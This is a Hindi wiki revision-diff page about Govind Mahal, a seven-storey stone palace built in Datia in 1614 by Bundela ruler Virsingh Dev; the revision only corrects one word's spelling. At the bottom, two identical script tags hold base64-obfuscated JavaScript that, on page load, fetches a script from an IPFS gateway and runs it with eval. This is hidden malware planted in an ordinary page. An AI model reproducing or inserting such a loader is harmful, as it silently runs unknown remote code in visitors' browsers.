Difference between revisions of "गोविन्द महल दतिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गोविन्द महल''' मध्य प्रदेश के दतिया में स्थित है। ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "नजारा" to "नज़ारा")
 
Line 4: Line 4:
 
*[[बुन्देला|बुन्देल]] शासकों द्वारा बनवाए गए सबसे बेहतरीन इमारतों में इस महल की गणना की जाती है।
 
*[[बुन्देला|बुन्देल]] शासकों द्वारा बनवाए गए सबसे बेहतरीन इमारतों में इस महल की गणना की जाती है।
 
*महल में विभिन्न प्रकार के आकर्षक और सुन्दर भित्तिचित्र बने हुए हैं।
 
*महल में विभिन्न प्रकार के आकर्षक और सुन्दर भित्तिचित्र बने हुए हैं।
*कुछ सुंदर मूर्तियों भी गोविन्द महल में स्थापित की गई हैं। महल की ऊपरी मंजिल से आस-पास के क्षेत्र का सुंदर नजारा देखा जा सकता है।
+
*कुछ सुंदर मूर्तियों भी गोविन्द महल में स्थापित की गई हैं। महल की ऊपरी मंजिल से आस-पास के क्षेत्र का सुंदर नज़ारा देखा जा सकता है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 14:36, 31 July 2014

govind mahal madhy pradesh ke datiya mean sthit hai. sat khandoan mean nirmit yah mahal pattharoan se banaya gaya hai.

  • govind mahal ko 1614 ee. mean raja virasianh dev bundela ne banavaya tha.
  • bundel shasakoan dvara banavae ge sabase behatarin imaratoan mean is mahal ki ganana ki jati hai.
  • mahal mean vibhinn prakar ke akarshak aur sundar bhittichitr bane hue haian.
  • kuchh suandar moortiyoan bhi govind mahal mean sthapit ki gee haian. mahal ki oopari manjil se as-pas ke kshetr ka suandar nazara dekha ja sakata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>